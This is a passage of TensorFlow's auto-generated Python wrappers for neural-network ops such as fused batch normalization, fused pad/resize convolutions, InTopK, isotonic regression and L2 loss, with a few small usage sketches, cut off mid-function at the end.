def fused_batch_norm_v2(x, scale, offset, mean, variance, epsilon=0.0001, exponential_avg_factor=1, data_format="NHWC", is_training=True, name=None):
r"""Batch normalization.
Note that the size of 4D Tensors is defined by either "NHWC" or "NCHW".
The size of 1D Tensors matches the dimension C of the 4D Tensors.
Args:
x: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
A 4D Tensor for input data.
scale: A `Tensor`. Must be one of the following types: `float32`.
A 1D Tensor for scaling factor, to scale the normalized x.
offset: A `Tensor`. Must have the same type as `scale`.
A 1D Tensor for offset, to shift to the normalized x.
mean: A `Tensor`. Must have the same type as `scale`.
A 1D Tensor for population mean. Used for inference only;
must be empty for training.
variance: A `Tensor`. Must have the same type as `scale`.
A 1D Tensor for population variance. Used for inference only;
must be empty for training.
epsilon: An optional `float`. Defaults to `0.0001`.
A small float number added to the variance of x.
exponential_avg_factor: An optional `float`. Defaults to `1`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
The data format for x and y. Either "NHWC" (default) or "NCHW".
is_training: An optional `bool`. Defaults to `True`.
A bool value to indicate the operation is for training (default)
or inference.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (y, batch_mean, batch_variance, reserve_space_1, reserve_space_2).
y: A `Tensor`. Has the same type as `x`.
batch_mean: A `Tensor`. Has the same type as `scale`.
batch_variance: A `Tensor`. Has the same type as `scale`.
reserve_space_1: A `Tensor`. Has the same type as `scale`.
reserve_space_2: A `Tensor`. Has the same type as `scale`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedBatchNormV2", name, x, scale, offset, mean, variance,
"epsilon", epsilon, "exponential_avg_factor", exponential_avg_factor,
"data_format", data_format, "is_training", is_training)
_result = _FusedBatchNormV2Output._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_batch_norm_v2_eager_fallback(
x, scale, offset, mean, variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if exponential_avg_factor is None:
exponential_avg_factor = 1
exponential_avg_factor = _execute.make_float(exponential_avg_factor, "exponential_avg_factor")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedBatchNormV2", x=x, scale=scale, offset=offset, mean=mean,
variance=variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "U", _op._get_attr_type("U"),
"epsilon", _op.get_attr("epsilon"), "exponential_avg_factor",
_op.get_attr("exponential_avg_factor"), "data_format",
_op.get_attr("data_format"), "is_training",
_op._get_attr_bool("is_training"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedBatchNormV2", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormV2Output._make(_result)
return _result
FusedBatchNormV2 = tf_export("raw_ops.FusedBatchNormV2")(_ops.to_raw_op(fused_batch_norm_v2))
def fused_batch_norm_v2_eager_fallback(x, scale, offset, mean, variance, epsilon, exponential_avg_factor, data_format, is_training, name, ctx):
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if exponential_avg_factor is None:
exponential_avg_factor = 1
exponential_avg_factor = _execute.make_float(exponential_avg_factor, "exponential_avg_factor")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_attr_T, (x,) = _execute.args_to_matching_eager([x], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ])
_attr_U, _inputs_U = _execute.args_to_matching_eager([scale, offset, mean, variance], ctx, [_dtypes.float32, ])
(scale, offset, mean, variance) = _inputs_U
_inputs_flat = [x, scale, offset, mean, variance]
_attrs = ("T", _attr_T, "U", _attr_U, "epsilon", epsilon,
"exponential_avg_factor", exponential_avg_factor, "data_format",
data_format, "is_training", is_training)
_result = _execute.execute(b"FusedBatchNormV2", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedBatchNormV2", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormV2Output._make(_result)
return _result
_FusedBatchNormV3Output = collections.namedtuple(
"FusedBatchNormV3",
["y", "batch_mean", "batch_variance", "reserve_space_1", "reserve_space_2", "reserve_space_3"])
def fused_batch_norm_v3(x, scale, offset, mean, variance, epsilon=0.0001, exponential_avg_factor=1, data_format="NHWC", is_training=True, name=None):
r"""Batch normalization.
Note that the size of 4D Tensors is defined by either "NHWC" or "NCHW".
The size of 1D Tensors matches the dimension C of the 4D Tensors.
Args:
x: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`.
A 4D Tensor for input data.
scale: A `Tensor`. Must be one of the following types: `float32`.
A 1D Tensor for scaling factor, to scale the normalized x.
offset: A `Tensor`. Must have the same type as `scale`.
A 1D Tensor for offset, to shift to the normalized x.
mean: A `Tensor`. Must have the same type as `scale`.
A 1D Tensor for population mean. Used for inference only;
must be empty for training.
variance: A `Tensor`. Must have the same type as `scale`.
A 1D Tensor for population variance. Used for inference only;
must be empty for training.
epsilon: An optional `float`. Defaults to `0.0001`.
A small float number added to the variance of x.
exponential_avg_factor: An optional `float`. Defaults to `1`.
data_format: An optional `string` from: `"NHWC", "NCHW", "NDHWC", "NCDHW"`. Defaults to `"NHWC"`.
The data format for x and y. Either "NHWC" (default) or "NCHW".
is_training: An optional `bool`. Defaults to `True`.
A bool value to indicate the operation is for training (default)
or inference.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (y, batch_mean, batch_variance, reserve_space_1, reserve_space_2, reserve_space_3).
y: A `Tensor`. Has the same type as `x`.
batch_mean: A `Tensor`. Has the same type as `scale`.
batch_variance: A `Tensor`. Has the same type as `scale`.
reserve_space_1: A `Tensor`. Has the same type as `scale`.
reserve_space_2: A `Tensor`. Has the same type as `scale`.
reserve_space_3: A `Tensor`. Has the same type as `scale`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedBatchNormV3", name, x, scale, offset, mean, variance,
"epsilon", epsilon, "exponential_avg_factor", exponential_avg_factor,
"data_format", data_format, "is_training", is_training)
_result = _FusedBatchNormV3Output._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_batch_norm_v3_eager_fallback(
x, scale, offset, mean, variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if exponential_avg_factor is None:
exponential_avg_factor = 1
exponential_avg_factor = _execute.make_float(exponential_avg_factor, "exponential_avg_factor")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedBatchNormV3", x=x, scale=scale, offset=offset, mean=mean,
variance=variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "U", _op._get_attr_type("U"),
"epsilon", _op.get_attr("epsilon"), "exponential_avg_factor",
_op.get_attr("exponential_avg_factor"), "data_format",
_op.get_attr("data_format"), "is_training",
_op._get_attr_bool("is_training"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedBatchNormV3", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormV3Output._make(_result)
return _result
FusedBatchNormV3 = tf_export("raw_ops.FusedBatchNormV3")(_ops.to_raw_op(fused_batch_norm_v3))
def fused_batch_norm_v3_eager_fallback(x, scale, offset, mean, variance, epsilon, exponential_avg_factor, data_format, is_training, name, ctx):
if epsilon is None:
epsilon = 0.0001
epsilon = _execute.make_float(epsilon, "epsilon")
if exponential_avg_factor is None:
exponential_avg_factor = 1
exponential_avg_factor = _execute.make_float(exponential_avg_factor, "exponential_avg_factor")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if is_training is None:
is_training = True
is_training = _execute.make_bool(is_training, "is_training")
_attr_T, (x,) = _execute.args_to_matching_eager([x], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, ])
_attr_U, _inputs_U = _execute.args_to_matching_eager([scale, offset, mean, variance], ctx, [_dtypes.float32, ])
(scale, offset, mean, variance) = _inputs_U
_inputs_flat = [x, scale, offset, mean, variance]
_attrs = ("T", _attr_T, "U", _attr_U, "epsilon", epsilon,
"exponential_avg_factor", exponential_avg_factor, "data_format",
data_format, "is_training", is_training)
_result = _execute.execute(b"FusedBatchNormV3", 6, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedBatchNormV3", _inputs_flat, _attrs, _result)
_result = _FusedBatchNormV3Output._make(_result)
return _result
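# A minimal training-mode sketch for the FusedBatchNormV3 op above. Per the
# docstring, `mean` and `variance` must be empty when is_training=True; the
# batch statistics come back as outputs. Shapes are illustrative only, and
# nothing in this module calls this helper.
def _example_fused_batch_norm_v3():
  import tensorflow as tf
  x = tf.random.normal([2, 4, 4, 3])           # NHWC input, C = 3
  empty = tf.constant([], dtype=tf.float32)
  out = tf.raw_ops.FusedBatchNormV3(
      x=x, scale=tf.ones([3]), offset=tf.zeros([3]),
      mean=empty, variance=empty, epsilon=1e-4, is_training=True)
  # out.y is the normalized x; batch_mean/batch_variance are batch statistics.
  return out.y, out.batch_mean, out.batch_variance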
def fused_pad_conv2d(input, paddings, filter, mode, strides, padding, name=None):
r"""Performs a padding as a preprocess during a convolution.
Similar to FusedResizeAndPadConv2D, this op allows for an optimized
implementation where the spatial padding transformation stage is fused with the
im2col lookup, but in this case without the bilinear filtering required for
resizing. Fusing the padding prevents the need to write out the intermediate
results as whole tensors, reducing memory pressure, and we can get some latency
gains by merging the transformation calculations.
The data_format attribute for Conv2D isn't supported by this op, and 'NHWC'
order is used instead.
Internally this op uses a single per-graph scratch buffer, which means that it
will block if multiple versions are being run in parallel. This is because this
operator is primarily an optimization to minimize memory usage.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `float32`, `float64`.
4-D with shape `[batch, in_height, in_width, in_channels]`.
paddings: A `Tensor` of type `int32`.
A two-column matrix specifying the padding sizes. The number of
rows must be the same as the rank of `input`.
filter: A `Tensor`. Must have the same type as `input`. 4-D with shape
`[filter_height, filter_width, in_channels, out_channels]`.
mode: A `string` from: `"REFLECT", "SYMMETRIC"`.
strides: A list of `ints`.
1-D of length 4. The stride of the sliding window for each dimension
of `input`. Must be in the same order as the dimension specified with format.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedPadConv2D", name, input, paddings, filter, "mode", mode,
"strides", strides, "padding", padding)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_pad_conv2d_eager_fallback(
input, paddings, filter, mode=mode, strides=strides,
padding=padding, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
mode = _execute.make_str(mode, "mode")
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'fused_pad_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedPadConv2D", input=input, paddings=paddings, filter=filter,
mode=mode, strides=strides, padding=padding,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "mode", _op.get_attr("mode"),
"strides", _op.get_attr("strides"), "padding",
_op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedPadConv2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
FusedPadConv2D = tf_export("raw_ops.FusedPadConv2D")(_ops.to_raw_op(fused_pad_conv2d))
def fused_pad_conv2d_eager_fallback(input, paddings, filter, mode, strides, padding, name, ctx):
mode = _execute.make_str(mode, "mode")
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'fused_pad_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter], ctx, [_dtypes.half, _dtypes.float32, _dtypes.float64, ])
(input, filter) = _inputs_T
paddings = _ops.convert_to_tensor(paddings, _dtypes.int32)
_inputs_flat = [input, paddings, filter]
_attrs = ("T", _attr_T, "mode", mode, "strides", strides, "padding",
padding)
_result = _execute.execute(b"FusedPadConv2D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedPadConv2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
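# A minimal sketch of the FusedPadConv2D op above: REFLECT-pad the input by
# one pixel on each spatial side, then run a VALID 3x3 convolution in one
# fused step. Shapes are illustrative; nothing in this module calls this.
def _example_fused_pad_conv2d():
  import tensorflow as tf
  x = tf.random.normal([1, 8, 8, 3])            # [batch, H, W, C_in]
  filt = tf.random.normal([3, 3, 3, 4])         # [fH, fW, C_in, C_out]
  paddings = [[0, 0], [1, 1], [1, 1], [0, 0]]   # one row per input dimension
  return tf.raw_ops.FusedPadConv2D(
      input=x, paddings=paddings, filter=filt, mode="REFLECT",
      strides=[1, 1, 1, 1], padding="VALID")    # output stays [1, 8, 8, 4]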
def fused_resize_and_pad_conv2d(input, size, paddings, filter, mode, strides, padding, resize_align_corners=False, name=None):
r"""Performs a resize and padding as a preprocess during a convolution.
It's often possible to do spatial transformations more efficiently as part of
the packing stage of a convolution, so this op allows for an optimized
implementation where these stages are fused together. This prevents the need to
write out the intermediate results as whole tensors, reducing memory pressure,
and we can get some latency gains by merging the transformation calculations.
The data_format attribute for Conv2D isn't supported by this op, and defaults to
'NHWC' order.
Internally this op uses a single per-graph scratch buffer, which means that it
will block if multiple versions are being run in parallel. This is because this
operator is primarily an optimization to minimize memory usage.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `float32`, `float64`.
4-D with shape `[batch, in_height, in_width, in_channels]`.
size: A `Tensor` of type `int32`.
A 1-D int32 Tensor of 2 elements: `new_height, new_width`. The
new size for the images.
paddings: A `Tensor` of type `int32`.
A two-column matrix specifying the padding sizes. The number of
rows must be the same as the rank of `input`.
filter: A `Tensor`. Must have the same type as `input`. 4-D with shape
`[filter_height, filter_width, in_channels, out_channels]`.
mode: A `string` from: `"REFLECT", "SYMMETRIC"`.
strides: A list of `ints`.
1-D of length 4. The stride of the sliding window for each dimension
of `input`. Must be in the same order as the dimension specified with format.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
resize_align_corners: An optional `bool`. Defaults to `False`.
If true, the centers of the 4 corner pixels of the input and output tensors are
aligned, preserving the values at the corner pixels. Defaults to false.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FusedResizeAndPadConv2D", name, input, size, paddings, filter,
"resize_align_corners", resize_align_corners, "mode", mode, "strides",
strides, "padding", padding)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fused_resize_and_pad_conv2d_eager_fallback(
input, size, paddings, filter,
resize_align_corners=resize_align_corners, mode=mode,
strides=strides, padding=padding, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
mode = _execute.make_str(mode, "mode")
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'fused_resize_and_pad_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if resize_align_corners is None:
resize_align_corners = False
resize_align_corners = _execute.make_bool(resize_align_corners, "resize_align_corners")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FusedResizeAndPadConv2D", input=input, size=size, paddings=paddings,
filter=filter, mode=mode, strides=strides,
padding=padding,
resize_align_corners=resize_align_corners,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "resize_align_corners",
_op._get_attr_bool("resize_align_corners"), "mode",
_op.get_attr("mode"), "strides", _op.get_attr("strides"),
"padding", _op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FusedResizeAndPadConv2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
FusedResizeAndPadConv2D = tf_export("raw_ops.FusedResizeAndPadConv2D")(_ops.to_raw_op(fused_resize_and_pad_conv2d))
def fused_resize_and_pad_conv2d_eager_fallback(input, size, paddings, filter, mode, strides, padding, resize_align_corners, name, ctx):
mode = _execute.make_str(mode, "mode")
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'fused_resize_and_pad_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if resize_align_corners is None:
resize_align_corners = False
resize_align_corners = _execute.make_bool(resize_align_corners, "resize_align_corners")
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter], ctx, [_dtypes.half, _dtypes.float32, _dtypes.float64, ])
(input, filter) = _inputs_T
size = _ops.convert_to_tensor(size, _dtypes.int32)
paddings = _ops.convert_to_tensor(paddings, _dtypes.int32)
_inputs_flat = [input, size, paddings, filter]
_attrs = ("T", _attr_T, "resize_align_corners", resize_align_corners,
"mode", mode, "strides", strides, "padding", padding)
_result = _execute.execute(b"FusedResizeAndPadConv2D", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FusedResizeAndPadConv2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
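# A minimal sketch of the FusedResizeAndPadConv2D op above: bilinearly resize
# to 16x16, REFLECT-pad one pixel per spatial side, then run a VALID 3x3
# convolution, all fused. Shapes are illustrative only; nothing in this
# module calls this helper.
def _example_fused_resize_and_pad_conv2d():
  import tensorflow as tf
  x = tf.random.normal([1, 8, 8, 3])
  filt = tf.random.normal([3, 3, 3, 4])
  return tf.raw_ops.FusedResizeAndPadConv2D(
      input=x, size=[16, 16], paddings=[[0, 0], [1, 1], [1, 1], [0, 0]],
      filter=filt, mode="REFLECT", strides=[1, 1, 1, 1], padding="VALID")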
def in_top_k(predictions, targets, k, name=None):
r"""Says whether the targets are in the top `K` predictions.
This outputs a `batch_size` bool array; an entry `out[i]` is `true` if the
prediction for the target class is among the top `k` predictions among
all predictions for example `i`. Note that the behavior of `InTopK` differs
from the `TopK` op in its handling of ties; if multiple classes have the
same prediction value and straddle the top-`k` boundary, all of those
classes are considered to be in the top `k`.
More formally, let
\\(predictions_i\\) be the predictions for all classes for example `i`,
\\(targets_i\\) be the target class for example `i`,
\\(out_i\\) be the output for example `i`,
$$out_i = predictions_{i, targets_i} \in TopKIncludingTies(predictions_i)$$
Args:
predictions: A `Tensor` of type `float32`.
A `batch_size` x `classes` tensor.
targets: A `Tensor`. Must be one of the following types: `int32`, `int64`.
A `batch_size` vector of class ids.
k: An `int`. Number of top elements to look at for computing precision.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `bool`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "InTopK", name, predictions, targets, "k", k)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return in_top_k_eager_fallback(
predictions, targets, k=k, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
k = _execute.make_int(k, "k")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"InTopK", predictions=predictions, targets=targets, k=k, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("k", _op._get_attr_int("k"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"InTopK", _inputs_flat, _attrs, _result)
_result, = _result
return _result
InTopK = tf_export("raw_ops.InTopK")(_ops.to_raw_op(in_top_k))
def in_top_k_eager_fallback(predictions, targets, k, name, ctx):
k = _execute.make_int(k, "k")
_attr_T, (targets,) = _execute.args_to_matching_eager([targets], ctx, [_dtypes.int32, _dtypes.int64, ], _dtypes.int32)
predictions = _ops.convert_to_tensor(predictions, _dtypes.float32)
_inputs_flat = [predictions, targets]
_attrs = ("k", k, "T", _attr_T)
_result = _execute.execute(b"InTopK", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"InTopK", _inputs_flat, _attrs, _result)
_result, = _result
return _result
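# A small worked example of the InTopK op above (InTopKV2 below is the same
# computation with `k` passed as a Tensor). The values are made up; nothing
# in this module calls this helper.
def _example_in_top_k():
  import tensorflow as tf
  predictions = tf.constant([[0.1, 0.8, 0.1],   # top-1 is class 1
                             [0.3, 0.3, 0.4]])  # top-1 is class 2
  targets = tf.constant([1, 0])
  # Row 0: target 1 is the top prediction -> True.
  # Row 1: target 0 (0.3) is below the top-1 boundary -> False.
  return tf.raw_ops.InTopK(predictions=predictions, targets=targets, k=1)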
def in_top_kv2(predictions, targets, k, name=None):
r"""Says whether the targets are in the top `K` predictions.
This outputs a `batch_size` bool array; an entry `out[i]` is `true` if the
prediction for the target class is among the top `k` predictions among
all predictions for example `i`. Note that the behavior of `InTopK` differs
from the `TopK` op in its handling of ties; if multiple classes have the
same prediction value and straddle the top-`k` boundary, all of those
classes are considered to be in the top `k`.
More formally, let
\\(predictions_i\\) be the predictions for all classes for example `i`,
\\(targets_i\\) be the target class for example `i`,
\\(out_i\\) be the output for example `i`,
$$out_i = predictions_{i, targets_i} \in TopKIncludingTies(predictions_i)$$
Args:
predictions: A `Tensor` of type `float32`.
A `batch_size` x `classes` tensor.
targets: A `Tensor`. Must be one of the following types: `int32`, `int64`.
A `batch_size` vector of class ids.
k: A `Tensor`. Must have the same type as `targets`.
Number of top elements to look at for computing precision.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `bool`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "InTopKV2", name, predictions, targets, k)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return in_top_kv2_eager_fallback(
predictions, targets, k, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"InTopKV2", predictions=predictions, targets=targets, k=k, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"InTopKV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
InTopKV2 = tf_export("raw_ops.InTopKV2")(_ops.to_raw_op(in_top_kv2))
def in_top_kv2_eager_fallback(predictions, targets, k, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([targets, k], ctx, [_dtypes.int32, _dtypes.int64, ], _dtypes.int32)
(targets, k) = _inputs_T
predictions = _ops.convert_to_tensor(predictions, _dtypes.float32)
_inputs_flat = [predictions, targets, k]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"InTopKV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"InTopKV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_IsotonicRegressionOutput = collections.namedtuple(
"IsotonicRegression",
["output", "segments"])
def isotonic_regression(input, output_dtype=_dtypes.float32, name=None):
r"""Solves a batch of isotonic regression problems.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
A (batch_size, dim)-tensor holding a batch of inputs.
output_dtype: An optional `tf.DType` from: `tf.half, tf.bfloat16, tf.float32, tf.float64`. Defaults to `tf.float32`.
Dtype of output.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, segments).
output: A `Tensor` of type `output_dtype`.
segments: A `Tensor` of type `int32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "IsotonicRegression", name, input, "output_dtype", output_dtype)
_result = _IsotonicRegressionOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return isotonic_regression_eager_fallback(
input, output_dtype=output_dtype, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if output_dtype is None:
output_dtype = _dtypes.float32
output_dtype = _execute.make_type(output_dtype, "output_dtype")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"IsotonicRegression", input=input, output_dtype=output_dtype,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "output_dtype",
_op._get_attr_type("output_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"IsotonicRegression", _inputs_flat, _attrs, _result)
_result = _IsotonicRegressionOutput._make(_result)
return _result
IsotonicRegression = tf_export("raw_ops.IsotonicRegression")(_ops.to_raw_op(isotonic_regression))
def isotonic_regression_eager_fallback(input, output_dtype, name, ctx):
if output_dtype is None:
output_dtype = _dtypes.float32
output_dtype = _execute.make_type(output_dtype, "output_dtype")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
_inputs_flat = [input]
_attrs = ("T", _attr_T, "output_dtype", output_dtype)
_result = _execute.execute(b"IsotonicRegression", 2, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"IsotonicRegression", _inputs_flat, _attrs, _result)
_result = _IsotonicRegressionOutput._make(_result)
return _result
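# A minimal sketch of the IsotonicRegression op above: each row of the input
# is projected onto an ordered (isotonic) sequence, and `segments` reports
# which entries were pooled together. Input values are illustrative; nothing
# in this module calls this helper.
def _example_isotonic_regression():
  import tensorflow as tf
  batch = tf.constant([[1.0, 3.0, 2.0, 4.0]])   # one problem of dim 4
  out = tf.raw_ops.IsotonicRegression(input=batch)
  return out.output, out.segments               # both shaped like the input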
@_dispatch.add_dispatch_list
@tf_export('nn.l2_loss')
def l2_loss(t, name=None):
r"""L2 Loss.
Computes half the L2 norm of a tensor without the `sqrt`:
output = sum(t ** 2) / 2
Args:
t: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
Typically 2-D, but may have any dimensions.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `t`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "L2Loss", name, t)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return l2_loss_eager_fallback(
t, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
l2_loss, (), dict(t=t, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"L2Loss", t=t, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
l2_loss, (), dict(t=t, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
